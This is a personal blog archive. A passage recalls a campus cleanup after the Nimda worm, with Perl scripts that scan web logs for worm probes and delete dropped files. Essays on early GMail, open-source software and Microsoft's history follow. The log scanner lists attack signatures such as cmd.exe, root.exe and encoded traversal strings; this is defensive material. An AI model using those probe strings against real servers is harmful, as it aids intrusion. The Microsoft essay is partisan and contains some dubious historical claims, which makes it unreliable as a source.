A quick rundown on how the virus spreads. Since no one really knew what it 'does' apart from spreading, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at the time and from our experience on the campus. Most of the links on this page have more information, but that does not take away from the fact that this information was crucial to us at the time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability. This is the method that was used by Code Red too. Infected servers randomly search for other servers running IIS and attack them. Some attack sequences that played out in vain against our Linux server are in Exhibit C. After a successful attack, the host is forced to run scripts that update the index*.* and default*.* files on the server with the JavaScript string and copy readme.eml into the various subdirectories. With this the infection of the host is complete. Of course, the worm also takes steps to protect itself against detection and removal on the host machine. Once infected, the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m., after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice of target is random, this is roughly the time it takes an infected server to find another one in the same IP range.
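A simple way to spot (and count) such probes is to scan the web server's access log for the tell-tale substrings from Exhibit B (f). The sketch below is a hedged illustration in Perl; the log path and the exact signature list are assumptions, not part of the original response.

#!/usr/bin/perl
# Sketch: count Nimda-style probes per source IP in an Apache access log.
# The log path is an assumption; adjust for your setup.
use strict;
use warnings;

my $log = shift || '/var/log/httpd/access_log';
open my $fh, '<', $log or die "cannot open $log: $!\n";

# Tell-tale substrings from the worm's request strings (Exhibit B, f)
my @signatures = ('cmd.exe', 'root.exe', '%255c', '%c0%af', '%c1%1c', 'Admin.dll');
my %hits;

while (my $line = <$fh>) {
    foreach my $sig (@signatures) {
        if (index($line, $sig) >= 0) {
            my ($ip) = split /\s+/, $line;   # first field of the common log format
            $hits{$ip}++;
            last;
        }
    }
}
close $fh;

foreach my $ip (sort { $hits{$b} <=> $hits{$a} } keys %hits) {
    printf "%-16s %6d probes\n", $ip, $hits{$ip};
}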

The second and third modes of transmission occur on client machines after they are infected. Client machines are infected when they visit any site that has been visited by Nimda. A popup JavaScript window opens that downloads, and opens directly without user intervention, the readme.eml file. This auto-execute behaviour is a security bug in IE 5.5, one that my downgraded copy of IE 5 did not have, and that is what saved my machine. Once readme.exe is executed - which may not even need a double click - the wily program is inside, and it takes a long time to clear out. More information on what it does is available all over the Web; click on the several links at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mails itself to all your contacts. The cycle then repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. The worm searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity to see what the file contains ends with the machine being compromised.

The long trudge back to normalcy

Back to the story. It was after noon and there were no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it onto the Linux machine. Now we unzipped the whole site and started seeing what needed to be done to have a clean version ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files; you can see the script in Exhibit A. Then a single find command deleted all the eml files from the entire site. We followed that up with a tar -cvzf and voilà, we had a clean version of the site to deploy - only no web server to deploy it on.
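The find one-liner itself is not preserved in my notes, so here is a hedged Perl equivalent using File::Find that removes every readme*.eml the worm dropped into the unpacked copy of the site. The directory path is an assumption.

#!/usr/bin/perl
# Sketch of the cleanup step described above: walk the unpacked site
# and delete every readme*.eml dropped by the worm.
use strict;
use warnings;
use File::Find;

my $site = shift || '/home/n_ravikiran/Website';   # assumed path

find(sub {
    # $_ is the bare file name inside the directory being visited
    if (-f $_ && /^readme.*\.eml$/i) {
        print "removing $File::Find::name\n";
        unlink $_ or warn "could not remove $File::Find::name: $!\n";
    }
}, $site);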

Our prayers were soon to be answered. Symantec did come out with the update, and we were back in action on the main server. Hours of downloads and the reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was misplaced. The patches for Code Red were not properly installed and there were other updates to be done before the cleaning would succeed. The next few hours were spent in cycles of search/locate/download-into-linux-server/ftp-to-main-server/patch-and-update.

In the meantime we used the machine which had a controlled copy of the worm to cause an infection and then clean it with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Also, our 6:00 p.m. deadline was upon us and we had to stretch it to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. Also, a step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out, armed with three diskettes containing the updates, to all the critical computer installations in the campus to clean and secure them before the 10:00 p.m. deadline.

The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would not know about until much later), the server must have rebooted a billion times. Finally the virus scan was in place, and we realized how lucky we were to have created a clean copy of the site ready for deployment. Norton was deleting all the files that it could not clean, and that included most of the startup pages of the web site and all of its sections. Letting the scan run completely, and many times over, we were quite sure that we were clean.

The 10:00 p.m. deadline came and the routers went online. The net-starved IIM Calcutta community immediately came online. To make it easy for the users, and also to provide an alternative till the main web server came up, the Linux box mirrored all the updates, and information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and the file copy was in progress. By around 1:00 a.m. the site tentatively came live, minus the cable connecting it to the network. After browsing for a while and making sure that the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline and deleting the admin.dll that had tftp'ed itself into the temp folder. Frantic searching located the missing patch. Patch-rinse-repeat. Now the server did hold but we did not have the energy to keep monitoring it or the guts to keep it online without supervision. So the server went back offline and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast, trying to complete my project, which suddenly had 40 fewer hours to its deadline. But the news was that the freshly patched server was holding up and doing well. Of course a number of client machines were still infected and needed to be cleaned. But so far we had not had a single report of late or cross infection.

(We got a 12 hour extension on the project submission and mine did go well in time. Thanks for asking anyway)

Related links

Symantec
McAfee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisory, with a number of other links too.
Another Fight - The TechRepublic battles

Document Changes
November 22, 2004: Essential rewrite of article stressing the central idea and new links too.
April 02, 2009: Updates and corrections.

May 27, 2004

First Look at GMail

A Preview into the next Block-Buster from Google

I logged into Blogger on the morning of 7th May, to discover a link that proclaimed that I was an 'active' user and invited me to sign up for a preview of Google's much awaited block-buster - GMail. Considering this is what I had been waiting for, ever since I heard the first whispers about GMail, I was more than happy to oblige.

The signup process was quick and painless. The GMail signup wizard picked up my name and email from Blogger, and brought me to a page that asked me to simply choose an account name. The text box had a helpful little button right underneath that said "Check Availability", to check if the particular account name was valid and available. Just the signup process showed how professional Google was going to be about GMail.

First Looks: The Simplicity

Soon, I was done with the registration and was dropped into my new GMail interface. The first thing that struck me was the simplicity and cleanliness of the interface. A big friendly GMail logo and the omnipresent search bar on the top. There was no toolbar cluttered with options, just a drop-down and a single button. The left hand side had just 7 links. The actual section where the mails are listed had just four columns, without any headings. The entire interface was designed to be clean and simple, to the point of being austere.

The single biggest difference between GMail and other email interfaces is simply this - GMail does not deal with emails. Instead it deals with conversations. A conversation, for GMail, is the entire set of related emails, including RE:'s and FW:'s. Any display of emails shows not the actual emails but entire conversations. The number of emails in a particular conversation is displayed in brackets. Further, the conversations are ordered by the time of the latest mail in each conversation.

Classification, Storing & Displaying Conversations

For GMail, there is one means of classification - labels. Labels are defined by the user, and each conversation can have any number of labels 'applied' to it. These labels can then be used to filter any display, showing just the mails that you need to see. There are no folders where mails can get lost, only filters that can be removed and reapplied with a single click. So much so that even the search is just another filter on the entire listing of conversations.

The only 'folder' that is hard coded is the "Archive" option, which effectively removes the mail from the inbox view. Another filtering/flagging option available is the "Starred" option, which visually distinguishes the various conversations. The Starred option, however, extends to individual mails as well, meaning that individual mails in a conversation can also be starred.

The actual interface showing the mails in a conversation is unfamiliar, but once you get used to it, very powerful. Each mail in the conversation is shown in a separate 'pane'. These panes are ordered linearly by time. Luckily GMail has refused to show the conversation in either a threaded or nested format, which increases simplicity and, correspondingly, accuracy.

The difference between the 'pane' and a mail is that a pane automagically removes all the quoted part of a mail. That means, in a conversation, the 10th mail usually contains the quoted text from the 9 previous mails. The pane however hides this to show only the content from the 10th mail. Of course, it is possible to show the quoted content too if desired. Drop into a relatively heavy conversation and you will see all the panes tightly stacked together. One click and this opens up into a looser stack, showing just the sender and the time for each pane. Each item can then be clicked to open, read and clicked again to send back into the stack.

Contacting your Contacts and Composing your Mails

Every person you mail to, or get a mail from is automatically in your contact list. How absolutely brilliantly simple and obvious. Why ever were we required to use divining capabilities to predict which of the contacts we are dealing with would be needed by us in the future? Of course, with 1 GB of space, you can afford this extravagance. Right now, though, the only contact information you can include is the Name, email and some Notes. I am not sure if I will not miss having fields for at least phone numbers. Another thing, as the owner you are automatically given a nickname 'me'.

Click on compose and you will be taken to a page with three text boxes and three buttons. Again, GMail's fanatic focus on simplicity shows. But true brilliance hits you when you start typing addresses in the "To" box. GMail's auto complete feature gets typing addresses back in fashion. If you were not impressed enough, hit the 'undock' icon on the right top corner of the compose screen and the entire compose screen pops right off the browser into a new window. Remember all of you who like to compose in a new window, while browsing messages in another? Well, GMail knows exactly what you are talking about.

The spell checking is another beautiful feature. GMail does a damn quick job of marking out all your mistakes in red, allowing you to interactively edit them. However, testing it with an excessive amount of text did produce some unexpected errors.

Keyboard Ahoy! and other UI features

Google extended its "keyboard shortcuts" beta feature to the GMail UI. This means that you can use a number of features without having to reach out for the mouse. This combined with the auto complete feature for filling in addresses is a hark back to the age of the *NIX interfaces, where the keyboard ruled. For those of you who believe in doing things fast, time spent in picking up at least a few of these shortcuts will prove to be a very valuable investment indeed. Those of you who don't give a damn about speed, please please please, just try out the feature once. The sheer genius of the implementation is bound to floor you completely.

GMail uses a variety of on-screen prompts to tell you what it is doing. Pages load blazingly fast, and if any one of them takes longer than a second to load, a brief floating message flashes on the top of the page to tell you that the page is "Loading...". While browsing a conversation, a similar floating message flashes on the bottom of the message, telling you whose message is expected next.

Another simple yet highly effective trick GMail uses to make life simple for us is to mark out those conversations that are addressed specifically to you, versus those that are part of a mailing list. They call this the "Personal level indicators". Again, an idea that is so dumb, that you wonder why no one else had thought of it before.

Other Issues

For most of us, having our email with our_stingy_free_service_provider.com, the single biggest reason to defect to GMail would be the 1 GB of email space it offers. For most of us, this would be a lifetime supply of email space. This, however, has not been one of the biggest reasons GMail has been in the news recently. The big controversy surrounds GMail's proposal to parse user email and display relevant ads alongside the message.

Compared with Yahoo's practice of appending monstrous, irrelevant ads to every email, this is hardly an issue. Further, Google's repeated clarifications that no human would ever access any email information - only machines would - leave little reason to be unhappy. Machines read our mails all the time. Spam filtering software does that. Web based email services do that while displaying messages. List servers (a la yahoogroups) do that when they munge email headers. Google does not even change the message content when it parses the mails; it only displays relevant ads alongside the email. Considering Google's stubborn insistence on being honest and open about all it does, I don't see the reason for any controversy.

The ads themselves are unobtrusive, plain text ads. And they are placed discreetly to the right, just like in Google searches. If you have searched on Google and have not been bothered by the sponsored ads, there is no reason for you to give a second thought to the ads in the Google inbox. In fact, considering that for once a company is taking my privacy seriously, and the ads themselves are so cutely non-intrusive, I might be tempted to check a few of them out, just for the heck of it.

Final Words of the First Look

GMail is an application that has been engineered in the REAL sense of the word. In a world where applications are lumps of collected functionality, GMail outshines almost every application known, let alone email clients. Conversations to store emails, labels instead of folders to classify conversations, keyboard shortcuts, and auto-completion of addresses are so mind-numbingly essential that I will start missing them in my email client from this second on. This, combined with 1 GB of storage, automatically stored contacts and the simple elegance of the UI, builds GMail into a formidable package.

Those of you who did not get to see it yet - Tough Luck People!

Document Changes
May, 07, 2004: First published version.

February 27, 2004

The Business of Open Source Software

An Introduction to Open Source Software

Even a casual follower of technical news would have noticed a recently strengthening trend in the mainstream press. There is ever-increasing mention of terms like Open Source, Free Software, and Linux. Further investigation would reveal that, for some reason, this issue seems to divide the world into two camps: those that feel very strongly about it and those that don’t.

That part of humanity, which feels strongly about Open Source Software (OSS) and Free Software (FS), wouldn’t have much use for this article. However, for those of you who are in the other camp and possess a mild curiosity about this phenomenon, this article attempts to unravel a few terms and provide a few perspectives.


What exactly is this beast?

This section is best started with a clarification. There is not one beast here but several, vastly different beasts. However, for the purpose of simplicity, we will not allude further to this difference. Instead we will try to gain an overview of the philosophy of Free/Open Source software. Further information is, however, easily available. [1][2]

In the 1970s, the world was still young. At least the world of computers was. The computer then was the Digital PDP-10 and software was something you wrote to get work done. The source code of software was freely available to see, modify, reuse, or improve. The 1980s, however, saw the breakdown of this culture, and the rise of proprietary software.

Proprietary software is different from free software. Usage of proprietary software is typically limited to the executable only, without access to its source code. The rights of users to attempt to modify the executable are severely curtailed. Further, compensation must be paid to the ‘owner’ of the proprietary software to gain limited rights to use it. The rights of the customer to reuse or share the software are also curtailed, according to the agreement signed for the purchase of the software. On the contrary, free software does not place such restrictions on reuse or sharing. Here, free does not mean without compensation, but rather the freedom to choose to use software without restrictions. Further, OSS distributes the source code of the software along with the executable, so that the user can read and modify it as he sees fit.

Returning to the story at hand, this change from the 70s to the 80s was not acceptable to a number of people. One such person was Richard Stallman. He was so irked by the closing up of the software community that he decided to do something about it. To ensure that the freedom to use software remained, he launched the GNU Project. The goal of the GNU Project was to build and distribute the components of a complete operating system, in line with the philosophy of having the freedom to use software as one sees fit.

In 1984, the GNU Project was set up. In 1985, its first product – GNU Emacs – was built and released to the world. In tune with the philosophy, GNU baulked at the proposition of “copyrighting” its work. Instead it “copylefted” its software under what came to be known as the GNU General Public License (GPL) [3]. Copyleft uses copyright law, but flips it over to serve the opposite of its usual purpose: instead of a means of privatizing software, it becomes a means of keeping software free.

By the 1990s, work was going on at full steam and a number of components of the UNIX system were being rewritten from scratch and released under the GPL. However, a complete system needs one crucial component to tie it all together – the kernel. GNU was working on a kernel called the Hurd, but the project was not delivering. And there could not be a complete 'free' system without a kernel.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that Minix, the Unix-look-alike operating system he was running on his personal computer, was not good enough. [4] He was pretty sure he could write something better. So, in a very brave and foolish attempt, he started to write his own. But in doing this he made an important decision: to involve other people. He took the help of a number of newsgroups of the time to ask for ideas and guidance. And from this sprang the kernel we now know as Linux. GNU/Linux became the complete "free" operating system that Richard Stallman and a number of others had been dreaming of.


So what does this mean to me?

No talk about OSS/FS is complete without talking about the other extreme, or at least the perceived extreme – Microsoft. Somewhere along the way, and not without reason, the fight for the freedom to use software has been morphed into a fight between Linus Torvalds and Microsoft (Bill Gates). To the media, of course, this sells copy, and it has done little to allay the misconception. However, the first step to understanding, using, and benefiting from OSS/FS is to break the media stereotype of David vs. Goliath.

Free software is not about cost. Free software is about freedom: freedom to use, freedom to reuse, freedom to distribute, and freedom to change. If this results in a perceived low initial investment, that has more to do with the economics of it than with it being the USP of free software.

Software is like other economic goods, and it is unlike other economic goods. It is like other economic goods because it needs effort and expertise to produce and serves an economic interest. It is unlike other economic goods because the marginal cost of producing additional copies is negligible. The returns on investment are much higher than for other economic goods, and reusability is higher than for any other investment. This leaves us with a peculiar scenario – an extremely useful economic good that is also very easy to reuse.

This gives rise to problems similar to those faced by the music and motion picture industries. But software is not art, and it can deliver monetary benefits. To protect such 'property', copyright law has typically been employed. Using the principles of IP to protect software the way music is protected has led to a monopoly-like situation. Accepting a proprietary software solution for a business process makes that business process monopolistically dependent on the software.

And a monopoly increases prices, significantly so.

After the bubble burst on the great IT dream, the software industry is facing a significant oversupply of resources, leading to low productivity. And this low productivity is sustained by the monopolistic premium charged by software vendors. To state it differently – the current process of developing, selling, deploying and administering software is grossly inefficient. This inefficiency is fuelled by the proprietary nature of software. The bottom line is that IT department budgets are taking the blame.

This is where OSS/FS plays a crucial role. By driving down the price of software, OSS/FS drives true productivity in the entire process of making and selling software. It is this productivity that shows up as the low price of OSS/FS; low price is not an inherent property of the software itself.


What can I do?

Understand the philosophy of OSS/FS. It is crucial to understand what freedom means, because it will help you appreciate the true nature of software in general and free software in particular. Further, no matter where you stand, it will help you form realistic expectations of OSS/FS.

If you run the IT department of a business, there are tremendous cost savings for you. Free software is easier to maintain and gives a lower TCO. Free software communities are a great place to snag amazing programmers from. Finally, free software gives you a flexibility of choice that is never possible on a proprietary platform.

If you are a programmer or a software maintainer, there is tremendous learning for you. There is knowledge beyond your wildest dreams in OSS/FS forums. OSS is a great way to read, obtain and reuse code snippets. FS gives you access to technologies never possible on a proprietary platform.

If you are an end user, OSS/FS is your source of productivity and flexibility. Recognize that OSS/FS is not about Windows versus Linux, but is about choice. When you make that investment into hardware or software, recognize that it is your right to demand more. And recognize that your hardware is capable of more, software is capable of more, and proprietary solutions are neither the highest nor the best benchmarks.


The road ahead

It is easy to talk about the great dream of free software ruling the earth. However, free software has its own, very obvious flaws. OSS/FS cannot be everywhere. OSS/FS cannot scale to meet every need. But it is a great way to recognize that software is not just another economic good, that you can demand and get more out of your IT buck, and that that freedom is your birthright.

[1] http://www.gnu.org/philosophy/philosophy.html
[2] http://www.gnu.org/gnu/thegnuproject.html
[3] http://www.gnu.org/copyleft/gpl.html
[4] http://www.geocities.com/n_ravikiran/write003.htm

Document Changes
February 27, 2004: First published version. This essay was written as a writing sample for an "Effective Business Writing" course.

February 26, 2004

Why Microsoft has no other alternative

A history of Microsoft, and why they are the way they are.

A few days back I had a discussion with a friend of mine. It centered around one of my favorite topics - Linux and Microsoft. The discussion was essentially about the idea of monopoly. My friend's view was that, being a monopoly, Microsoft was justified in behaving the way it does. My counter-point, however, was that this monopoly itself was ill-earned - which naturally needed a lot more clarification. Hence this article.

The History

Microsoft was formed by Bill Gates and Paul Allen, and began, around 1975, by writing a BASIC interpreter for the MITS Altair home computer. It struggled through the first few years of its existence, looking for its niche in the market. In 1980, IBM was waking up and was like the proverbial cat on a hot tin roof: it wanted to get a machine on the market as soon as possible. And instead of going ahead with another version of an 8-bit machine, it chose to go with the 16-bit Intel 8086 family (the PC eventually shipped with the 8088 variant). This meant IBM needed a new OS, and fast.

A number of things happened in a very short time. Microsoft bought an existing PC operating system. IBM chose not to wait for CP/M to be written for its new processor. Microsoft offered to bundle its OS with the IBM PC (for peanuts), and also to work with IBM to develop it. MS-DOS was released in 1981. (A brief history of DOS here and here.)

MS-DOS was itself not an original product of Microsoft. It was the creation of a company called Seattle Computer Products and of Tim Paterson (who later joined Microsoft). It was known as QDOS 0.10 (Quick and Dirty Operating System) before Microsoft bought all rights to the OS from Seattle Computer and changed the name to MS-DOS 1.0.

IBM never intended that MS-DOS (or PC DOS) be the operating system for the IBM PC. It was in fact waiting for CP/M to come out with its 8086 version. What happened was something quite different. Squabbles between Digital Research (the vendor of CP/M) and IBM delayed CP/M-86. With Microsoft the sole interested party in providing an operating system, IBM found itself with nothing other than QDOS 0.10, under the name of MS-DOS 1.0, to ship with the IBM PC in October 1981. The quality of this product was so bad that the initial IBM PC shipped without an operating system. Later, IBM itself undertook a rigorous rewrite of MS-DOS to get it partially ready for bundling with its PC (PC DOS is hence copyrighted by both IBM and Microsoft). In spite of this, Digital Research's CP/M-86 might still have become the operating system for the PC but for two things: Digital Research wanted $495 for CP/M-86, and many software developers found it easier to port existing CP/M software to DOS than to the new CP/M-86 operating system. Priced at $39.95, DOS became the automatic choice for users of the new range of IBM PCs. Thus Microsoft's (poor) clone of CP/M managed to become the de facto operating system for the IBM PC, not by any technical superiority, or even a marketing blitz (which Microsoft was quite incapable of undertaking at the time), but by sheer timing.

What happened to the IBM PC is, as they say, history. Riding on the success of the IBM PC, MS-DOS became the default operating system in the PC world. Despite this success, MS-DOS was never technically superior to its contemporaries. MS-DOS 1.0 was nothing but QDOS 0.10. Support for hard disks came with version 2.0 in '83, followed by 3.0 in '84; network support did not arrive until version 3.1 in 1984. While the rest of the world (read Unix) boasted of incredibly powerful and versatile OSes running on a variety of hardware platforms, MS-DOS was still shipping extremely buggy releases, up to version 4.0 in 1988. Many of the basic utilities and tools that should normally form part of any operating system were only included as late as versions 5.0 and 6.0, in '91 and '93 respectively. Version 6.22, released in 1994, was the last official stand-alone 'DOS version' of MS-DOS, while 7.0 and 7.1 were released almost exclusively for use as a basis for Windows 95.

MS-DOS was never a technical marvel. Its success had more to do with some decisions, some people, and the explosion called the IBM PC. But today's Microsoft is not about DOS; it is about quite another thing called Windows. But let's begin at the beginning.

The concept of a graphical user interface originated in the mid-1970s at the Xerox Palo Alto Research Center (PARC), where a graphical interface was developed for the Xerox Star computer system introduced in April 1981. PARC had earlier had a success story with the Alto computer, which by the mid-'70s was so successful technologically that it quickly became the benchmark for all graphical interfaces that came later. The Xerox Star did not see any commercial success, but its ideas were copied by Apple Computer, first in the innovative Lisa in 1983 and then in the Apple Macintosh introduced in January 1984. With these machines, Apple provided WIMP (windows, icons, mice, pointers) interfaces and features like folders and long file names which, in the PC world, were not fully implemented till Windows 95.

To put it simply, when Windows 95 was released, the reaction of Apple users was "But we had all that 10 years ago". So why did the world wait for Windows 95? The Alto machines were more of a technological demonstration than a commercial venture. They were the path-breakers that defined the future of computing, but they were unfortunately not commercial successes. Apple suffered from different problems. Apple was a vertically integrated computer company: it made its own architecture, built its own computers, developed its own OS and wrote its own applications. Also, Apple did not interoperate with any other system. In an industry that was rapidly moving towards commoditization, Apple was a very costly lock-in. Commercial interests took a back seat at Apple while it chose to be the cult, the renegade, and it paid the price. Apple never could pose a challenge to Microsoft, because they never met on the same playground. Apple played on its own hardware, in its own niche, while the huge IBM playground was left to Microsoft alone.

These were, however, not the only products that could have challenged Windows. Quite a few other products provided graphical operating systems, or graphical shells on top of DOS that could multitask DOS applications - something the native OS had failed to provide. VisiOn from VisiCorp, which came on the heels of VisiCalc, the groundbreaking spreadsheet program, failed because it was way too early: the hardware was just not ready for it. Digital Research's GEM (Graphical Environment Manager) could not run DOS applications. Quarterdeck Office Systems' DESQview succeeded for a limited time, till Windows 3.0 became the standard.

It was not just technology and timing that bogged down Microsoft's competition. IBM suffered from short-sightedness: it felt that the GUI was just a passing phase. TopView from IBM was introduced in '85 and discontinued in '87. Windows 1.0, when it was released in 1985, was so similar to the Apple Macintosh that the latter threatened to sue Microsoft. In an ingenious move, Microsoft signed a licensing agreement with Apple stating that Microsoft would not employ Apple technology in Windows 1.0, but made no such commitment for further versions of Windows. However, Windows 1.0's dismal failure in the market made it pointless for Apple to follow up with litigation.

Windows' failure, however, did not hurt Microsoft the way it would have hurt other companies, because Microsoft had DOS - a revenue source to fund more and more development on the Windows platform, something no other company could frankly afford. Version after version, Microsoft bungled Windows, but MS-DOS gave it enough revenue to keep at it. By the time Windows became as good as most of the products mentioned here, the competition was dead. Curiously, by the time Windows was finally ready, so were the application developers, and so was Intel's hardware. When Windows 3.1 (and Windows for Workgroups) was released, it was singularly user friendly, had a large set of third-party applications to choose from, and had hardware that could keep up with the demands of a graphical interface. For the first time PCs with Windows were outselling the Mac, and Apple could do nothing about it. Propelled by the popularity of its own Word and Excel, Windows rode the craze for the GUI-driven PC, guided by the able hands of the future of Microsoft - the incredible marketing machine.

Unlike the old world monopolies of the likes of AT&T, technical superiority was never a hallmark of Microsoft's success. And therein lies the reason for Microsoft being the way it is.

So what does this mean?

Monopolies are always a bad idea. They survive by making the cost of entry into a business very high. Microsoft is a monopoly in the PC OS and office applications segment. Like other monopolies - say, AT&T - Microsoft tends to spend its time defending its position rather than innovating. A monopoly works to raise the already high barrier to entry even higher. As a result, innovation suffers. And when innovation suffers at a company like Microsoft, which produces operating systems, everyone suffers.

The first alarming effect of Microsoft as a monopoly is due to the fact that it writes operating systems. Writing an operating system is a thankless job. An operating system is the base that runs user application programs. Since it sits just above the hardware, there is only so much the OS can do, and consequently there is very little innovation possible in an operating system. Writing an operating system, making it proprietary, and making people pay for it is therefore an unsustainable business proposition. Hence Microsoft does what it is doing - bundle in software and gain unfair advantages in the application space. Bundle in Internet Explorer, Outlook Express, Windows Media Player. Tweak Windows to run Office components better than competitors' products. Withhold Windows API information from third-party software developers. All these practices are not only anti-competitive, but directly affect end users in a number of ways.

The second reason why Microsoft's position is a dangerous one is the fact that Windows has been developed rather than designed. Microsoft has put backward compatibility ahead of other technical considerations. While this might be a good thing in the short run, let's understand why it is deadly in the long run.

Writing an operating system is based on certain standards. Unix-like OSes are built on standards like POSIX, which define the basis for building an OS. So POSIX-based operating systems have a designed-in strength in security, performance and architecture. Windows, on the other hand, was developed. Windows from 1.0 through 98 ran as a shell on top of DOS; in effect, it extended the capabilities provided by DOS. Hence the security model, file system, and so on offered by Windows were limited by the underlying DOS. Microsoft recognized this early and started another thread of development called NT (New Technology). Windows NT 4.0 was a major commercial success, and Windows 2000 continued the NT line; after Windows 98 (and Me), the consumer and NT trees were finally merged in Windows XP, which followed shortly after. You will notice that all through this, there was no significant break with the past. Never was there a chance for Microsoft to correct the errors of the early QDOS and start afresh. Never could Microsoft address issues that were inherent to its offering. In effect, its mantra of backward compatibility became its own choke-hold.

Windows and Microsoft have preempted any questioning by customers by doling out goodies: extreme simplification, integration and ease of use. This is a third reason to be really scared. Technologies like OLE and ActiveX have been polished and pushed repeatedly. Drag and drop has been used to woo customers. Windows file sharing has replaced FTP. Windows has challenged, without reason, the traditional wisdom that operating systems have to be separate from applications, by creating a huge monolithic OS/App. While this has brought computing to the masses, it has also created a technological Chernobyl waiting to happen.

In 1983, Fred Cohen, working on his PhD at the University of Southern California, created the concept of a "self-replicating" program. By 1987, the virus was a known term. 1988 changed all that with the Jerusalem virus, which started making serious trouble. And the trouble did not stop. Lehigh, Tequila, the Dark Avenger Mutation Engine, the Virus Creation Laboratory, Word Concept, Chernobyl, Melissa, ILoveYou, Nimda, Sircam, CodeRed, Klez, BugBear, Slammer and Mydoom represent the woes of the PC world. Symantec became a household name. The email attachment became a bad word. Simplification, tight integration, backward compatibility and Windows' success have created this extremely intolerant monoculture.

There is more. Windows owes its success to the fact that it embraced an open hardware platform (Intel), unlike Apple, which bet itself on proprietary hardware. Now Microsoft is doing the same thing with applications and operating systems: it is creating customers by locking them into its operating system and refusing to interoperate with other OSes. What Apple did with hardware, Microsoft is doing with its OS. This lack of interoperability today could well be its Achilles heel tomorrow.

One other effect of this lock-in is rising costs for users. It is no longer possible to get Windows without paying for IE and WMP. This not only reduces options, it also makes the OS an expensive proposition. And as Windows comes with all its bells and whistles, hardware costs rise correspondingly to provide horsepower the user never needs. A home user, using the computer for email only, cannot upgrade from Windows 98 to 2000 without also paying for a doubly costly hardware upgrade. In short, end-user costs are rising.

It is not as if Microsoft is unaware of this. It is, and its actions are directed by this awareness. Microsoft wants to move away from the OS market into anything else - the Xbox, handhelds, application software and what not. And each foray of Microsoft's is ruthless, bordering on the illegal. The browser wars were the beginning. The war against Java was yet another. The war of Windows Media Player against the likes of Real is just heating up, and will not be the last. With Microsoft's cash pile funding these wars, and given its stranglehold on the computer world, they are almost a no-contest for Microsoft - but for the fact that many of the tactics used by Microsoft run afoul of antitrust regulators. If Microsoft escaped the US regulators, the EU regulators might yet prove to be a different breed.

Microsoft is not on the leading edge of technology. It is, however, an awesome marketing machine. And right now it seems invincible. Microsoft depends on this idea of invincibility for its survival; its stock price depends on this aura. Microsoft's high valuation rests on the very high price of its shares, and that price can hold only if Microsoft can prove, year after year, that it is growing at breakneck speed. It does not matter what technology it develops or what markets it enters - its growth is the biggest asset it has today. The moment its investors realize that Microsoft cannot grow the way it has been growing, all hell will break loose. The stock price will drop, initiating a downward spiral.

Microsoft must not seem vincible.

The Microsoft Philosophy

Almost everything that Microsoft does is directed at the upkeep of this image of invincibility. This, in short, is the philosophy of Microsoft.

This philosophy is brought out with a measure of sickening clarity in what are known as the Halloween Documents. The body of the Halloween Document is an internal strategy memorandum on Microsoft's possible responses to the Linux/Open Source phenomenon. It was meant to be an internal study, but was leaked around Halloween 1998. The document itself is a fascinating read. Two comments made in the annotated copy of the document over at opensource.org are very revealing. I reproduce them here without their context; the reader need not accept them at face value, but may want to check the actual context in the document and judge the validity of the statements for himself.

The first talks about the focus on perception at Microsoft, the 'technology company'.

"

Note the clever distinction here (which Eric missed in his analysis). "customer's eyes" (in Microsoft's own words) rather than any real code quality. In other words, to Microsoft and the software market in general, a software product has "commercial quality" if it has the "look and feel" of commercial software products. A product has commercial quality code if and only if there is a public perception that it is made with commercial quality code. This means that MS will take seriously any product that has an appealing, commercial-looking appearance because MS assumes -- rightly so -- that this is what the typical, uninformed consumer uses as the judgment benchmark for what is "good code".

"

The second is even more damning. Commenting on the Halloween documents' perceived strengths of the Open Source movement:

"

The difference here is, in every release cycle Microsoft always listens to its most ignorant customers. This is the key to dumbing down each release cycle of software for further assaulting the non-PC population. Linux and OS/2 developers, OTOH, tend to listen to their smartest customers. This necessarily limits the initial appeal of the operating system, while enhancing its long-term benefits. Perhaps only a monopolist like Microsoft could get away with selling worse products each generation -- products focused so narrowly on the least-technical member of the consumer base that they necessarily sacrifice technical excellence. Linux and OS/2 tend to appeal to the customer who knows greatness when he or she sees it. The good that Microsoft does in bringing computers to the non-users is outdone by the curse they bring upon the experienced users, because their monopoly position tends to force everyone toward the lowest-common-denominator, not just the new users.

Note: This means that Microsoft does the ``heavy lifting'' of expanding the overall PC marketplace. The great fear at Microsoft is that somebody will come behind them and make products that not only are more reliable, faster, and more secure, but are also easy to use, fun, and make people more productive. That would mean that Microsoft had merely served as a pioneer and taken all the arrows in the back, while we who have better products become a second wave to homestead on Microsoft's tamed territory. Well, sounds like a good idea to me.

"

The effect of the Microsoft monopoly, and a glimpse into its philosophy, are well brought out in the two quotes above.

Conclusions

This is by no means a comprehensive outburst on Microsoft. However, a number of ideas picked up over a period of time have found their way into this article. Many thanks to all those hordes out there who helped me give shape to, and drape in logic, the vague ideas I felt from time to time.

We have a lot to thank Microsoft for - if not for bringing computing to the masses, then for a simplification and dumbing down of technology that was long overdue. But that large-scale dumbing down has itself become the curse we have to deal with today. Microsoft is a giant and at the same time a kid: a giant in its market control and the usage of its products, but a kid in its tantrums and its desperate philosophy. It is like a kid with a gun, and I don't trust them one bit.

Related links

A brief history of DOS here and here
